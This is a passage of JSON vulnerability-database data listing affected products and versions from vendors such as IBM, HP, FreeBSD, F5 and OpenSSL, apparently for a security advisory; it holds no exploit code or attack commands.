"eq", "trust": 0.3, "vendor": "ibm", "version": "79120" }, { "model": "data ontap smi-s agent", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.2" }, { "model": "matrix operating environment", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "7.3" }, { "model": "tealeaf cx", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.8" }, { "model": "version control agent", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "7.2" }, { "model": "-releng", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "4.8" }, { "model": "-release", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "5.4" }, { "model": "security network intrusion prevention system gv200", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.3" }, { "model": "-release-p5", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "6.0" }, { "model": "scale out network attached storage", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.4.1.0" }, { "model": "-releng", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "4.0" }, { "model": "flex system compute node", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "x2407863" }, { "model": "flex system fc3171 8gb san switch", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "9.1" }, { "model": "system management homepage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "7.5.4" }, { "model": "-stable", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "3.5.1" }, { "model": "flex system manager", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.3.1.0" }, { "model": "idatplex dx360 m4 water cooled type", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "79180" }, { "model": "-release", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "6.1" }, { "model": "system m4", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "x35007383" }, { "model": "-release", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "5.1" }, { "model": "security network protection", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "31005.1.2" }, { "model": "release-p4", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "9.1" }, { "model": "tivoli composite application manager for transactions", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1.0" }, { "model": "tivoli endpoint manager for remote control", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.2.1" }, { "model": "project openssl 1.0.1g", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "systems insight manager", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "5.0" }, { "model": "tivoli composite application manager for transactions", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.4" }, { "model": "linux sparc", "scope": "eq", "trust": 0.3, "vendor": "ubuntu", "version": "10.04" }, { "model": "10.0-release-p1", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "aura experience portal", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "7.0" }, { "model": "clustered data ontap antivirus connector", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "1.0.2" }, { "model": "-prerelease", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "7.0" }, { "model": "9.1-rc2", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "websphere datapower soa appliance", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.0.0.8" }, { "model": "rational application developer for websphere", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "9.1" }, { "model": "security network intrusion prevention system gx4004", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.6" }, { "model": "flex system compute node", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "x2207906" }, { "model": "security network intrusion prevention system gv1000", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.6" }, { "model": "systems insight manager", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "7.2.1" }, { "model": "websphere datapower soa appliance", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.0.14" }, { "model": "-releng", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "4.9" }, { "model": "vios", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2.2.4" }, { "model": "-stable", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "3.5" }, { "model": "command center appliance", "scope": "eq", "trust": 0.3, "vendor": "citrix", "version": "0" }, { "model": "-stable", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "4.7" }, { "model": "sterling file gateway", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.1" }, { "model": "tealeaf cx", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1" }, { "model": "big-ip ltm", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.5.1" }, { "model": "-release/alpha", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "5.1" }, { "model": "8.2-stable", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "vios", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2.2.0" }, { "model": "initiate master data service patient hub", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "9.7" }, { "model": "freebsd", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "2.2.1" }, { "model": "websphere datapower soa appliance", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.00" }, { "model": "9.2-release-p8", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "netscaler gateway", "scope": "eq", "trust": 0.3, "vendor": "citrix", "version": "0" }, { "model": "junos os 14.2r1", "scope": null, "trust": 0.3, "vendor": "juniper", "version": null }, { "model": "oncommand unified manager core package", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5" }, { "model": "2-stable", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "-release", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "5.2" }, { "model": "security network intrusion prevention system gx3002", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.5" }, { "model": "9.1--releng", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "tivoli provisioning manager for os deployment", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.1" }, { "model": "freebsd", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "3.2" }, { "model": "-stable", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "6.1" }, { "model": "proventia network security controller 1.0.3352m", "scope": null, "trust": 0.3, "vendor": "ibm", "version": null }, { "model": "idatplex dx360 m4 type", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "79130" }, { "model": "infosphere master data management patient hub", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "10.0" }, { "model": "6.3-release-p10", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "tivoli composite application manager for transactions", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.2.0" }, { "model": "9.3-beta3-p2", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "security network intrusion prevention system gv200", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.5" }, { "model": "-release-p20", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "4.6" }, { "model": "tealeaf cx", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.2" }, { "model": "freebsd", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "2.1" }, { "model": "security network intrusion prevention system gx5008-v2", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.3" }, { "model": "image construction and composition tool", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2.1.1" }, { "model": "-release-p8", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "6.3" }, { "model": "security network intrusion prevention system gx5008", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.6" }, { "model": "flex system fc5022 16gb san scalable switch 7.2.1c", "scope": null, "trust": 0.3, "vendor": "ibm", "version": null }, { "model": "9.0-release-p6", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "-release-p14", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "5.0" }, { "model": "security network intrusion prevention system gx7800", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.3" }, { "model": "security network intrusion prevention system gx7412-10", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.6.2" }, { "model": "version control repository manager", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "7.5.0" }, { "model": "qradar siem mr2", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1" }, { "model": "-stablepre2001-07-20", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "3.5.1" }, { "model": "upward integration modules for microsoft system center", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.5.2" }, { "model": "security network intrusion prevention system gx3002", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.4" }, { "model": "freebsd", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "4.5" }, { "model": "8.3-stable", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "service manager", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "7.10" }, { "model": "6.3-release-p11", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "vios", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2.14" }, { "model": "freebsd", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "2.0.5" }, { "model": "freebsd", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "4.2" }, { "model": "virtual connect enterprise manager sdk", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "7.4" }, { "model": "-releng", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "3.0" }, { "model": "9.2-rc2", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "version control repository manager", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "7.3" }, { "model": "snapdrive for windows", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.0" }, { "model": "security network intrusion prevention system gv200", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.4" }, { "model": "cloudsystem matrix", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "7.2" }, { "model": "system m4", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "x33007382" }, { "model": "-release", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "5.3" }, { "model": "-release", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "4.6" }, { "model": "sametime", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.5.2.1" }, { "model": "initiate master data service", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "9.5" }, { "model": "virtual connect 8gb 24-port fc module", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "1.0" }, { "model": "7.2-rc2", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "7.0-release-p12", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "matrix operating environment", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "7.5" }, { "model": "9.0-rc3", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "upward integration modules for microsoft system center", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "5.5.3" }, { "model": "security network intrusion prevention system gx7412", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.6.1" }, { "model": "open systems snapvault", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.0" }, { "model": "-releng", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "6.3" }, { "model": "junos os 13.3r4", "scope": null, "trust": 0.3, "vendor": "juniper", "version": null }, { "model": "vios", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2.0.11" }, { "model": "upward integration modules hardware management pack", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.5.2" }, { "model": "endpoint manager for remote control", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "9.1.0" }, { "model": "upward integration modules for microsoft system center", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.0.2" }, { "model": "system type", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "x3850x638370" }, { "model": "-release-p3", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "4.11" }, { "model": "freebsd", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "8.1" }, { "model": "freebsd", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "4.4" }, { "model": "netscaler application delivery controller", "scope": "eq", "trust": 0.3, "vendor": "citrix", "version": "0" }, { "model": "systems director", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.3.20" }, { "model": "security network intrusion prevention system gx4004-v2", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.6.2" }, { "model": "upward integration modules integrated installer", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.5.2" }, { "model": "oncommand unified manager core package", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.2" }, { "model": "enterprise linux desktop", "scope": "eq", "trust": 0.3, "vendor": "redhat", "version": "6" }, { "model": "9.1-release-p12", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "7.1-release-p4", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "flex system manager", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.3.0.1" }, { "model": "security network protection", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "31005.2" }, { "model": "aura session manager", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.3" }, { "model": "big-ip apm", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.5.1" }, { "model": "version control agent", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "7.3.3" }, { "model": "websphere datapower soa appliance", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.0.13" }, { "model": "matrix operating environment", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "7.2.2" }, { "model": "insight control server deployment", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "7.2.0" }, { "model": "freebsd", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "6.0" }, { "model": "system management homepage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "7.2.3" }, { "model": "7.0-stable", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "sdk for node.js", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.1.0.3" }, { "model": "systems insight manager", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "7.3.1" }, { "model": "rc2", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "9.2" }, { "model": "initiate master data service", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "10.1" }, { "model": "9.0-rc1", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "flex system manager node", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7955" }, { "model": "security network intrusion prevention system gx5008-v2", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.5" }, { "model": "-releng", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "6.2" }, { "model": "security network intrusion prevention system gx5208", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.6.1" }, { "model": "security network intrusion prevention system gx4002", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.3" }, { "model": "nextscale nx360 m4 type", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "54550" }, { "model": "big-ip aam", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.5.1" }, { "model": "upward integration modules for microsoft system center", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.5.1" }, { "model": "-stable", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "5.3" }, { "model": "websphere datapower soa appliance", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.08" }, { "model": "7.2-release-p4", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "-stablepre122300", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "4.2" }, { "model": "websphere datapower soa appliance", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.015" }, { "model": "vios", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2.0.13" }, { "model": "security network intrusion prevention system gv1000", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.6.1" }, { "model": "freebsd", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "3.2x" }, { "model": "7.1-release-p5", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "7.0-release-p8", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "linux ia-64", "scope": "eq", "trust": 0.3, "vendor": "debian", "version": "6.0" }, { "model": "enterprise linux", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "6.2" }, { "model": "8.4-release-p8", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "systems director", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.3.5.0" }, { "model": "prerelease", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "9.2" }, { "model": "big-ip pem", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.5" }, { "model": "freebsd", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "5.1" }, { "model": "big-ip apm", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.6.0" }, { "model": "-release", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "5.2.1" }, { "model": "flex system compute node", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "x2408738" }, { "model": "insight control", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "7.2" }, { "model": "sterling connect:direct for microsoft windows", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.5.01" }, { "model": "snapdrive for windows", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.0.2" }, { "model": "8.1-release-p5", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "vios", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2.3.2" }, { "model": "servicecenter", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "6.2" }, { "model": "security network intrusion prevention system gx5008-v2", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.4" }, { "model": "security network intrusion prevention system gx7412-05", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.6.2" }, { "model": "-release", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "5.5" }, { "model": "freebsd", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "4.0.x" }, { "model": "-release", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "4.11" }, { "model": "9.3-rc", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "snapdrive for unix", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.1" }, { "model": "enterprise linux workstation", "scope": "eq", "trust": 0.3, "vendor": "redhat", "version": "6" }, { "model": "9.3-beta1", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "cloudsystem matrix", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "7.2.1" }, { "model": "data ontap smi-s agent", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.1.1" }, { "model": "8.4-release-p13", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "security network intrusion prevention system gx7412-10", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.5" }, { "model": "7.1-stable", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "snapdrive for windows", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "7.1.2" }, { "model": "systems insight manager", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "7.2.2" }, { "model": "version control agent", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "7.3.1" }, { "model": "freebsd", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "6.2" }, { "model": "enterprise linux desktop", "scope": "eq", "trust": 0.3, "vendor": "redhat", "version": "7" }, { "model": "security network intrusion prevention system gx5008", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.6.1" }, { "model": "service manager", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "9.31" }, { "model": "10.0-rc3-p1", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "systems insight manager", "scope": "ne", "trust": 0.3, "vendor": "hp", "version": "7.5.1" }, { "model": "freebsd", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "2.1.7" }, { "model": "-pre-release", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "7.1" }, { "model": "infosphere master data management provider hub", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "10.0" }, { "model": "freebsd", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "9.2" }, { "model": "initiate master data service", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "9.7" }, { "model": "system m4 type", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "x365079150" }, { "model": "rational application developer for websphere", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "9.1.0.1" }, { "model": "8.0-release", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "websphere datapower soa appliance", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.0.0.0" }, { "model": "security network intrusion prevention system gx4002", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.5" }, { "model": "flex system fc3171 8gb san switch", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "9.1.3" }, { "model": "9.3-stable", "scope": "ne", "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "enterprise linux load balancer eus 6.5.z", "scope": null, "trust": 0.3, "vendor": "redhat", "version": null }, { "model": "security network intrusion prevention system gx7412-10", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.4" }, { "model": "9.2-rc2-p2", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "systems insight manager", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "5.3" }, { "model": "security network intrusion prevention system gv200", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.6" }, { "model": "-stable", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "5.5" }, { "model": "system management homepage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "6.1" }, { "model": "ip office server edition", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "9.0" }, { "model": "websphere datapower soa appliance", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.0.0.6" }, { "model": "scale out network attached storage", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.3.2.2" }, { "model": "-stable", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "4.11" }, { "model": "9.2-release-p7", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "big-ip gtm", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.5" }, { "model": "system m4", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "x35507914" }, { "model": "scale out network attached storage", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.4.2.1" }, { "model": "8.3-release-p15", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "websphere datapower soa appliance", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.0.0.9" }, { "model": "project openssl 1.0.1c", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "9.1-release-p11", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "freebsd", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "7.0" }, { "model": "9.1-release-p16", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "freebsd", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "8.3" }, { "model": "-release-p3", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "7.4" }, { "model": "7.3-release-p1", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "freebsd", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "2.1.5" }, { "model": "7.2-prerelease", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "data ontap smi-s agent", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "5.2.1" }, { "model": "freebsd", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "3.3x" }, { "model": "9.3-rc2-p1", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "tssc", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.0" }, { "model": "8.3-release-p8", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "security network intrusion prevention system gx4002", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.4" }, { "model": "-stablepre2002-03-07", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "4.5" }, { "model": "security network intrusion prevention system gx5108-v2", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.3" }, { "model": "project openssl 1.0.1f", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "sterling connect:direct for microsoft windows", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.5.00" }, { "model": "oncommand workflow automation", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2" }, { "model": "upward integration modules for vmware vsphere", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.0.2" }, { "model": "security network intrusion prevention system gx6116", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.6.2" }, { "model": "system management homepage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "7.2.4.1" }, { "model": "gpfs for windows", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.5.0.11" }, { "model": "system m4 type", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "x357087330" }, { "model": "freebsd", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "1.2" }, { "model": "8.3-release-p11", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "freebsd", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "2.1.6.1" }, { "model": "tivoli provisioning manager for images", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1.1.0" }, { "model": "upward integration modules for microsoft system center", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.0.1" }, { "model": "upward integration modules scvmm add-in", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.0.2" }, { "model": "7.2-stable", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "freebsd", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "3.3" }, { "model": "sametime", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "9.0.0.0" }, { "model": "8.3-releng", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "9.2-release-p3", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "flex system fc5022 16gb san scalable switch 7.3.0a", "scope": null, "trust": 0.3, "vendor": "ibm", "version": null }, { "model": "cms r17", "scope": null, "trust": 0.3, "vendor": "avaya", "version": null }, { "model": "scale out network attached storage", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.3.2" }, { "model": "flex system manager", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.1.0.0" }, { "model": "7.3-release", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "sdk for node.js", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "1.1.0.7" }, { "model": "enterprise linux", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "7" }, { "model": "initiate master data service", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "10.0" }, { "model": "6.4-release-p11", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "sterling file gateway", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2" }, { "model": "oncommand workflow automation", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "3.0" }, { "model": "oncommand unified manager core package 5.2.1p1", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": null }, { "model": "freebsd", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "9.0" }, { "model": "8.4-release-p11", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "-release-p9", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "6.3" }, { "model": "7.4-release-p12", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "linux amd64", "scope": "eq", "trust": 0.3, "vendor": "debian", "version": "6.0" }, { "model": "scale out network attached storage", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.4.3.1" }, { "model": "security network intrusion prevention system gx7412-05", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.5" }, { "model": "alpha", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "4.0" }, { "model": "security network intrusion prevention system gx6116", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.6.1" }, { "model": "matrix operating environment", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "7.3.2" }, { "model": "8.3-release-p14", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "security network protection", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "41005.1.1" }, { "model": "flex system compute node", "scope": "eq", "trust": 